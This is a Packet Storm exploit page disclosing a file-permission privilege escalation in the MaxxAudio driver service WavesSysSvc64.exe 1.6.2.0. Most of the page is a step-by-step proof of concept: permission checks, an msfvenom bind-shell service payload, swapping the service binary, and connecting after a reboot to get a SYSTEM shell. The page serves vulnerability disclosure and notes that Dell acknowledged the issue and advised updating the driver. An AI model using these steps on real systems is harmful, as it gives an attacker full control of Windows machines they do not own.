exploit the possibilities

MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 Privilege Escalation

MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 Privilege Escalation
Posted Feb 19, 2019
Authored by Mike Siegel

MaxxAudio Drivers WavesSysSvc64.exe version 1.6.2.0 suffers from a file permission privilege escalation vulnerability that results in SYSTEM level access.

tags | exploit
MD5 | 6bff06b4648f823eae1a83c736360757

MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 Privilege Escalation

Change Mirror Download
# Exploit Title: MaxxAudio Drivers WavesSysSvc64.exe File Permissions SYSTEM Privilege Escalation 
# Google Dork:
# Date: 2/18/2019
# Exploit Author: Mike Siegel @ml_siegel
# Vendor Homepage: https://maxx.com
# Software Link:
# Version: 1.6.2.0 (May affect other versions)
# Tested on: Win 10 64 bit
# CVE : None

MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations.

MaxxAudio drivers version 1.6.2.0 install with incorrect file permissions. As a result a local attacker can escalate to SYSTEM level privileges.

Dell PSIRT has acknowledged the issue and advises updating to a supported driver.

Proof of concept:

1. Validate incorrect permissions.

C:\Users\user> sc qc wavessyssvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: wavessyssvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


C:\Users\user>icacls "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
ACME\user:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Users\user>

2. Create payload

Create a service payload in msfvenom, transfer to victim:

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe-service -o service.exe

3. Overwrite file.

The file will be in use, you cannot directly overwrite. However you can move the file and replace.

C:\Users\user> move "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe" "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.bak"
C:\Users\user> copy service.exe "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"

4. Reboot the system. Then use netcat or telnet to connect back to 127.0.0.1:4444

C:\WINDOWS\SYSTEM32>whoami
whoami
nt authority\system


Additional information:

This file is embedded in Realtek audio drivers. Dell has since removed this version from their site but it appears to have been released in January 2017.
hash is as follows: cbd0c592c59db94d27ad89db2db7432c0c40db69198d9174eb1bb4bd04e12213 *WavesSysSvc64.exe

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    11 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close